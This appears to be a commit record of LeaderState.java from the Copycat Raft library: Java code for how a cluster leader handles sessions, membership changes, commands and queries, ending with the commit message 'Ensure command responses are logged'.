entry.setTerm(context.getTerm()) .setTimestamp(timestamp) .setClient(request.client()) .setTimeout(timeout); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<RegisterResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((sessionId, sessionError) -> { if (isOpen()) { if (sessionError == null) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.OK) .withSession((Long) sessionId) .withTimeout(timeout) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())).build())); } else if (sessionError instanceof CompletionException && sessionError.getCause() instanceof CopycatException) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) sessionError.getCause()).getType()) .build())); } else if (sessionError instanceof CopycatException) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) sessionError).getType()) .build())); } else { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<ConnectResponse> connect(ConnectRequest request, Connection connection) { context.checkThread(); logRequest(request); // Associate the connection with the appropriate client. context.getStateMachine().executor().context().sessions().registerConnection(request.client(), connection); return CompletableFuture.completedFuture(ConnectResponse.builder() .withStatus(Response.Status.OK) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())) .build()) .thenApply(this::logResponse); } @Override public CompletableFuture<KeepAliveResponse> keepAlive(KeepAliveRequest request) { final long timestamp = System.currentTimeMillis(); final long index; context.checkThread(); logRequest(request); try (KeepAliveEntry entry = context.getLog().create(KeepAliveEntry.class)) { entry.setTerm(context.getTerm()) .setSession(request.session()) .setCommandSequence(request.commandSequence()) .setEventIndex(request.eventIndex()) .setTimestamp(timestamp); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<KeepAliveResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((sessionResult, sessionError) -> { if (isOpen()) { if (sessionError == null) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.OK) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())).build())); } else if (sessionError instanceof CompletionException && sessionError.getCause() instanceof CopycatException) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(((CopycatException) sessionError.getCause()).getType()) .build())); } else if (sessionError instanceof CopycatException) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(((CopycatException) sessionError).getType()) .build())); } else { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<UnregisterResponse> unregister(UnregisterRequest request) { final long timestamp = System.currentTimeMillis(); final long index; context.checkThread(); logRequest(request); try (UnregisterEntry entry = context.getLog().create(UnregisterEntry.class)) { entry.setTerm(context.getTerm()) .setSession(request.session()) .setExpired(false) .setTimestamp(timestamp); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<UnregisterResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((unregisterResult, unregisterError) -> { if (isOpen()) { if (unregisterError == null) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.OK) .build())); } else if (unregisterError instanceof CompletionException && unregisterError.getCause() instanceof CopycatException) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) unregisterError.getCause()).getType()) .build())); } else if (unregisterError instanceof CopycatException) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) unregisterError).getType()) .build())); } else { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } /** * Cancels the append timer. */ private void cancelAppendTimer() { if (appendTimer != null) { LOGGER.debug("{} - Cancelling append timer", context.getCluster().member().address()); appendTimer.cancel(); } } /** * Ensures the local server is not the leader. */ private void stepDown() { if (context.getLeader() != null && context.getLeader().equals(context.getCluster().member())) { context.setLeader(0); } } @Override public synchronized CompletableFuture<Void> close() { return super.close() .thenRun(appender::close) .thenRun(this::cancelAppendTimer) .thenRun(this::stepDown); } }
server/src/main/java/io/atomix/copycat/server/state/LeaderState.java
/* * Copyright 2015 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.atomix.copycat.server.state; import io.atomix.catalyst.concurrent.ComposableFuture; import io.atomix.catalyst.concurrent.Scheduled; import io.atomix.catalyst.transport.Connection; import io.atomix.catalyst.util.Assert; import io.atomix.copycat.Command; import io.atomix.copycat.Query; import io.atomix.copycat.error.CopycatError; import io.atomix.copycat.error.CopycatException; import io.atomix.copycat.protocol.*; import io.atomix.copycat.server.CopycatServer; import io.atomix.copycat.server.cluster.Member; import io.atomix.copycat.server.protocol.*; import io.atomix.copycat.server.storage.entry.*; import io.atomix.copycat.server.storage.system.Configuration; import io.atomix.copycat.session.Session; import java.time.Duration; import java.time.Instant; import java.util.Collection; import java.util.concurrent.CompletableFuture; import java.util.concurrent.CompletionException; import java.util.stream.Collectors; /** * Leader state. * * @author <a href="http://github.com/kuujo">Jordan Halterman</a> */ final class LeaderState extends ActiveState { // Max request queue size *per session* - necessary to limit the stack size private static final int MAX_REQUEST_QUEUE_SIZE = 100; private final LeaderAppender appender; private Scheduled appendTimer; private long configuring; public LeaderState(ServerContext context) { super(context); this.appender = new LeaderAppender(this); } @Override public CopycatServer.State type() { return CopycatServer.State.LEADER; } @Override public synchronized CompletableFuture<ServerState> open() { // Reset state for the leader. takeLeadership(); // Append initial entries to the log, including an initial no-op entry and the server's configuration. appendInitialEntries(); // Commit the initial leader entries. commitInitialEntries(); return super.open() .thenRun(this::startAppendTimer) .thenApply(v -> this); } /** * Sets the current node as the cluster leader. */ private void takeLeadership() { context.setLeader(context.getCluster().member().id()); context.getClusterState().getRemoteMemberStates().forEach(m -> m.resetState(context.getLog())); } /** * Appends initial entries to the log to take leadership. */ private void appendInitialEntries() { final long term = context.getTerm(); // Append a no-op entry to reset session timeouts and commit entries from prior terms. try (InitializeEntry entry = context.getLog().create(InitializeEntry.class)) { entry.setTerm(term) .setTimestamp(appender.time()); Assert.state(context.getLog().append(entry) == appender.index(), "Initialize entry not appended at the start of the leader's term"); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Append a configuration entry to propagate the leader's cluster configuration. configure(context.getCluster().members()); } /** * Commits a no-op entry to the log, ensuring any entries from a previous term are committed. */ private CompletableFuture<Void> commitInitialEntries() { // The Raft protocol dictates that leaders cannot commit entries from previous terms until // at least one entry from their current term has been stored on a majority of servers. Thus, // we force entries to be appended up to the leader's no-op entry. The LeaderAppender will ensure // that the commitIndex is not increased until the no-op entry (appender.index()) is committed. CompletableFuture<Void> future = new CompletableFuture<>(); appender.appendEntries(appender.index()).whenComplete((resultIndex, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { context.getStateMachine().apply(resultIndex); future.complete(null); } else { context.setLeader(0); context.transition(CopycatServer.State.FOLLOWER); } } }); return future; } /** * Starts sending AppendEntries requests to all cluster members. */ private void startAppendTimer() { // Set a timer that will be used to periodically synchronize with other nodes // in the cluster. This timer acts as a heartbeat to ensure this node remains // the leader. LOGGER.debug("{} - Starting append timer", context.getCluster().member().address()); appendTimer = context.getThreadContext().schedule(Duration.ZERO, context.getHeartbeatInterval(), this::appendMembers); } /** * Sends AppendEntries requests to members of the cluster that haven't heard from the leader in a while. */ private void appendMembers() { context.checkThread(); if (isOpen()) { appender.appendEntries(); } } /** * Checks to determine whether any sessions have expired. * <p> * Copycat allows only leaders to explicitly unregister sessions due to expiration. This ensures * that sessions cannot be expired by lengthy election periods or other disruptions to time. * To do so, the leader periodically iterates through registered sessions and checks for sessions * that have been marked suspicious. The internal state machine marks sessions as suspicious when * keep alive entries are not committed for longer than the session timeout. Once the leader marks * a session as suspicious, it will log and replicate an {@link UnregisterEntry} to unregister the session. */ private void checkSessions() { long term = context.getTerm(); // Iterate through all currently registered sessions. for (ServerSessionContext session : context.getStateMachine().executor().context().sessions().sessions.values()) { // If the session isn't already being unregistered by this leader and a keep-alive entry hasn't // been committed for the session in some time, log and commit a new UnregisterEntry. if (session.state() == Session.State.UNSTABLE && !session.isUnregistering()) { LOGGER.debug("{} - Detected expired session: {}", context.getCluster().member().address(), session.id()); // Log the unregister entry, indicating that the session was explicitly unregistered by the leader. // This will result in state machine expire() methods being called when the entry is applied. final long index; try (UnregisterEntry entry = context.getLog().create(UnregisterEntry.class)) { entry.setTerm(term) .setSession(session.id()) .setExpired(true) .setTimestamp(System.currentTimeMillis()); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Commit the unregister entry and apply it to the state machine. appender.appendEntries(index).whenComplete((result, error) -> { if (isOpen()) { context.getStateMachine().apply(index); } }); // Mark the session as being unregistered in order to ensure this leader doesn't attempt // to unregister it again. session.unregister(); } } } /** * Returns a boolean value indicating whether a configuration is currently being committed. * * @return Indicates whether a configuration is currently being committed. */ boolean configuring() { return configuring > 0; } /** * Returns a boolean value indicating whether the leader is still being initialized. * * @return Indicates whether the leader is still being initialized. */ boolean initializing() { // If the leader index is 0 or is greater than the commitIndex, do not allow configuration changes. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E return appender.index() == 0 || context.getCommitIndex() < appender.index(); } /** * Commits the given configuration. */ protected CompletableFuture<Long> configure(Collection<Member> members) { final long index; try (ConfigurationEntry entry = context.getLog().create(ConfigurationEntry.class)) { entry.setTerm(context.getTerm()) .setTimestamp(System.currentTimeMillis()) .setMembers(members); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); // Store the index of the configuration entry in order to prevent other configurations from // being logged and committed concurrently. This is an important safety property of Raft. configuring = index; context.getClusterState().configure(new Configuration(entry.getIndex(), entry.getTerm(), entry.getTimestamp(), entry.getMembers())); } return appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { // Reset the configuration index to allow new configuration changes to be committed. configuring = 0; } }); } @Override public CompletableFuture<JoinResponse> join(final JoinRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the join requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(JoinResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the member is already a known member of the cluster, complete the join successfully. if (context.getCluster().member(request.member().id()) != null) { return CompletableFuture.completedFuture(logResponse(JoinResponse.builder() .withStatus(Response.Status.OK) .withIndex(context.getClusterState().getConfiguration().index()) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(context.getCluster().members()) .build())); } Member member = request.member(); // Add the joining member to the members list. If the joining member's type is ACTIVE, join the member in the // PROMOTABLE state to allow it to get caught up without impacting the quorum size. Collection<Member> members = context.getCluster().members(); members.add(new ServerMember(member.type(), member.serverAddress(), member.clientAddress(), Instant.now())); CompletableFuture<JoinResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(JoinResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(JoinResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<ReconfigureResponse> reconfigure(final ReconfigureRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the promote requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the member is not a known member of the cluster, fail the promotion. ServerMember existingMember = context.getClusterState().member(request.member().id()); if (existingMember == null) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } // If the configuration request index is less than the last known configuration index for // the leader, fail the request to ensure servers can't reconfigure an old configuration. if (request.index() > 0 && request.index() < context.getClusterState().getConfiguration().index() || request.term() != context.getClusterState().getConfiguration().term() && (existingMember.type() != request.member().type() || existingMember.status() != request.member().status())) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.CONFIGURATION_ERROR) .build())); } Member member = request.member(); // If the client address is being set or has changed, update the configuration. if (member.clientAddress() != null && (existingMember.clientAddress() == null || !existingMember.clientAddress().equals(member.clientAddress()))) { existingMember.update(member.clientAddress(), Instant.now()); } // Update the member type. existingMember.update(request.member().type(), Instant.now()); Collection<Member> members = context.getCluster().members(); CompletableFuture<ReconfigureResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<LeaveResponse> leave(final LeaveRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the join requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(LeaveResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the leaving member is not a known member of the cluster, complete the leave successfully. if (context.getCluster().member(request.member().id()) == null) { return CompletableFuture.completedFuture(logResponse(LeaveResponse.builder() .withStatus(Response.Status.OK) .withMembers(context.getCluster().members()) .build())); } Member member = request.member(); Collection<Member> members = context.getCluster().members(); members.remove(member); CompletableFuture<LeaveResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(LeaveResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(LeaveResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<PollResponse> poll(final PollRequest request) { logRequest(request); // If a member sends a PollRequest to the leader, that indicates that it likely healed from // a network partition and may have had its status set to UNAVAILABLE by the leader. In order // to ensure heartbeats are immediately stored to the member, update its status if necessary. ServerMember member = context.getClusterState().getRemoteMember(request.candidate()); if (member != null && member.status() == Member.Status.UNAVAILABLE) { member.update(Member.Status.AVAILABLE, Instant.now()); configure(context.getCluster().members()); } return CompletableFuture.completedFuture(logResponse(PollResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withAccepted(false) .build())); } @Override public CompletableFuture<VoteResponse> vote(final VoteRequest request) { if (updateTermAndLeader(request.term(), 0)) { LOGGER.debug("{} - Received greater term", context.getCluster().member().address()); context.transition(CopycatServer.State.FOLLOWER); return super.vote(request); } else { logRequest(request); return CompletableFuture.completedFuture(logResponse(VoteResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withVoted(false) .build())); } } @Override public CompletableFuture<AppendResponse> append(final AppendRequest request) { context.checkThread(); if (updateTermAndLeader(request.term(), request.leader())) { CompletableFuture<AppendResponse> future = super.append(request); context.transition(CopycatServer.State.FOLLOWER); return future; } else if (request.term() < context.getTerm()) { logRequest(request); return CompletableFuture.completedFuture(logResponse(AppendResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withSucceeded(false) .withLogIndex(context.getLog().lastIndex()) .build())); } else { context.setLeader(request.leader()).transition(CopycatServer.State.FOLLOWER); return super.append(request); } } @Override public CompletableFuture<CommandResponse> command(final CommandRequest request) { context.checkThread(); logRequest(request); // Get the client's server session. If the session doesn't exist, return an unknown session error. ServerSessionContext session = context.getStateMachine().executor().context().sessions().getSession(request.session()); if (session == null) { return CompletableFuture.completedFuture(logResponse(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } ComposableFuture<CommandResponse> future = new ComposableFuture<>(); sequenceCommand(request, session, future); return future; } /** * Sequences the given command to the log. */ private void sequenceCommand(CommandRequest request, ServerSessionContext session, CompletableFuture<CommandResponse> future) { // If the command is LINEARIZABLE and the session's current sequence number is less then one prior to the request // sequence number, queue this request for handling later. We want to handle command requests in the order in which // they were sent by the client. Note that it's possible for the session sequence number to be greater than the request // sequence number. In that case, it's likely that the command was submitted more than once to the // cluster, and the command will be deduplicated once applied to the state machine. if (request.sequence() > session.nextRequestSequence()) { // If the request sequence number is more than 1k requests above the last sequenced request, reject the request. // The client should resubmit a request that fails with a COMMAND_ERROR. if (request.sequence() - session.getRequestSequence() > MAX_REQUEST_QUEUE_SIZE) { future.complete(logResponse(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.COMMAND_ERROR) .build())); } // Register the request in the request queue if it's not too far ahead of the current sequence number. else { session.registerRequest(request.sequence(), () -> applyCommand(request, session, future)); } } else { applyCommand(request, session, future); } } /** * Applies the given command to the log. */ private void applyCommand(CommandRequest request, ServerSessionContext session, CompletableFuture<CommandResponse> future) { final Command command = request.command(); final long term = context.getTerm(); final long timestamp = System.currentTimeMillis(); final long index; // Create a CommandEntry and append it to the log. try (CommandEntry entry = context.getLog().create(CommandEntry.class)) { entry.setTerm(term) .setSession(request.session()) .setTimestamp(timestamp) .setSequence(request.sequence()) .setCommand(command); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Replicate the command to followers. appendCommand(index, future); // Set the last processed request for the session. This will cause sequential command callbacks to be executed. session.setRequestSequence(request.sequence()); } /** * Sends append requests for a command to followers. */ private void appendCommand(long index, CompletableFuture<CommandResponse> future) { appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { applyCommand(index, future); } else { future.complete(logResponse(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); } /** * Applies a command to the state machine. */ private void applyCommand(long index, CompletableFuture<CommandResponse> future) { context.getStateMachine().<ServerStateMachine.Result>apply(index).whenComplete((result, error) -> { if (isOpen()) { completeOperation(result, CommandResponse.builder(), error, future); } }); } @Override public CompletableFuture<QueryResponse> query(final QueryRequest request) { Query query = request.query(); final long timestamp = System.currentTimeMillis(); context.checkThread(); logRequest(request); QueryEntry entry = context.getLog().create(QueryEntry.class) .setIndex(request.index()) .setTerm(context.getTerm()) .setTimestamp(timestamp) .setSession(request.session()) .setSequence(request.sequence()) .setQuery(query); return query(entry).thenApply(this::logResponse); } /** * Applies the given query entry to the state machine according to the query's consistency level. */ private CompletableFuture<QueryResponse> query(QueryEntry entry) { Query.ConsistencyLevel consistency = entry.getQuery().consistency(); if (consistency == null) return queryLinearizable(entry); switch (consistency) { case SEQUENTIAL: return queryLocal(entry); case LINEARIZABLE_LEASE: return queryBoundedLinearizable(entry); case LINEARIZABLE: return queryLinearizable(entry); default: throw new IllegalStateException("unknown consistency level"); } } /** * Executes a bounded linearizable query. * <p> * Bounded linearizable queries succeed as long as this server remains the leader. This is possible * since the leader will step down in the event it fails to contact a majority of the cluster. */ private CompletableFuture<QueryResponse> queryBoundedLinearizable(QueryEntry entry) { return sequenceAndApply(entry); } /** * Executes a linearizable query. * <p> * Linearizable queries are first sequenced with commands and then applied to the state machine. Once * applied, we verify the node's leadership prior to responding successfully to the query. */ private CompletableFuture<QueryResponse> queryLinearizable(QueryEntry entry) { return sequenceAndApply(entry) .thenCompose(response -> appender.appendEntries() .thenApply(index -> response) .exceptionally(error -> QueryResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.QUERY_ERROR) .build())); } /** * Sequences and applies the given query entry. */ private CompletableFuture<QueryResponse> sequenceAndApply(QueryEntry entry) { // Get the client's server session. If the session doesn't exist, return an unknown session error. ServerSessionContext session = context.getStateMachine().executor().context().sessions().getSession(entry.getSession()); if (session == null) { return CompletableFuture.completedFuture(logResponse(QueryResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } CompletableFuture<QueryResponse> future = new CompletableFuture<>(); // If the query's sequence number is greater than the session's current sequence number, queue the request for // handling once the state machine is caught up. if (entry.getSequence() > session.getCommandSequence()) { session.registerSequenceQuery(entry.getSequence(), () -> applyQuery(entry, future)); } else { applyQuery(entry, future); } return future; } @Override public CompletableFuture<RegisterResponse> register(RegisterRequest request) { final long timestamp = System.currentTimeMillis(); final long index; // If the client submitted a session timeout, use the client's timeout, otherwise use the configured // default server session timeout. final long timeout; if (request.timeout() != 0) { timeout = request.timeout(); } else { timeout = context.getSessionTimeout().toMillis(); } context.checkThread(); logRequest(request); // The timeout is logged in the RegisterEntry to ensure that all nodes see a consistent timeout for the session. try (RegisterEntry entry = context.getLog().create(RegisterEntry.class)) { entry.setTerm(context.getTerm()) .setTimestamp(timestamp) .setClient(request.client()) .setTimeout(timeout); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<RegisterResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((sessionId, sessionError) -> { if (isOpen()) { if (sessionError == null) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.OK) .withSession((Long) sessionId) .withTimeout(timeout) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())).build())); } else if (sessionError instanceof CompletionException && sessionError.getCause() instanceof CopycatException) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) sessionError.getCause()).getType()) .build())); } else if (sessionError instanceof CopycatException) { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) sessionError).getType()) .build())); } else { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(RegisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<ConnectResponse> connect(ConnectRequest request, Connection connection) { context.checkThread(); logRequest(request); // Associate the connection with the appropriate client. context.getStateMachine().executor().context().sessions().registerConnection(request.client(), connection); return CompletableFuture.completedFuture(ConnectResponse.builder() .withStatus(Response.Status.OK) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())) .build()) .thenApply(this::logResponse); } @Override public CompletableFuture<KeepAliveResponse> keepAlive(KeepAliveRequest request) { final long timestamp = System.currentTimeMillis(); final long index; context.checkThread(); logRequest(request); try (KeepAliveEntry entry = context.getLog().create(KeepAliveEntry.class)) { entry.setTerm(context.getTerm()) .setSession(request.session()) .setCommandSequence(request.commandSequence()) .setEventIndex(request.eventIndex()) .setTimestamp(timestamp); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<KeepAliveResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((sessionResult, sessionError) -> { if (isOpen()) { if (sessionError == null) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.OK) .withLeader(context.getCluster().member().clientAddress()) .withMembers(context.getCluster().members().stream() .map(Member::clientAddress) .filter(m -> m != null) .collect(Collectors.toList())).build())); } else if (sessionError instanceof CompletionException && sessionError.getCause() instanceof CopycatException) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(((CopycatException) sessionError.getCause()).getType()) .build())); } else if (sessionError instanceof CopycatException) { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(((CopycatException) sessionError).getType()) .build())); } else { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(KeepAliveResponse.builder() .withStatus(Response.Status.ERROR) .withLeader(context.getCluster().member().clientAddress()) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<UnregisterResponse> unregister(UnregisterRequest request) { final long timestamp = System.currentTimeMillis(); final long index; context.checkThread(); logRequest(request); try (UnregisterEntry entry = context.getLog().create(UnregisterEntry.class)) { entry.setTerm(context.getTerm()) .setSession(request.session()) .setExpired(false) .setTimestamp(timestamp); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } CompletableFuture<UnregisterResponse> future = new CompletableFuture<>(); appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { context.getStateMachine().apply(index).whenComplete((unregisterResult, unregisterError) -> { if (isOpen()) { if (unregisterError == null) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.OK) .build())); } else if (unregisterError instanceof CompletionException && unregisterError.getCause() instanceof CopycatException) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) unregisterError.getCause()).getType()) .build())); } else if (unregisterError instanceof CopycatException) { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(((CopycatException) unregisterError).getType()) .build())); } else { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } checkSessions(); } }); } else { future.complete(logResponse(UnregisterResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } /** * Cancels the append timer. */ private void cancelAppendTimer() { if (appendTimer != null) { LOGGER.debug("{} - Cancelling append timer", context.getCluster().member().address()); appendTimer.cancel(); } } /** * Ensures the local server is not the leader. */ private void stepDown() { if (context.getLeader() != null && context.getLeader().equals(context.getCluster().member())) { context.setLeader(0); } } @Override public synchronized CompletableFuture<Void> close() { return super.close() .thenRun(appender::close) .thenRun(this::cancelAppendTimer) .thenRun(this::stepDown); } }
Ensure command responses are logged.
server/src/main/java/io/atomix/copycat/server/state/LeaderState.java
Ensure command responses are logged.
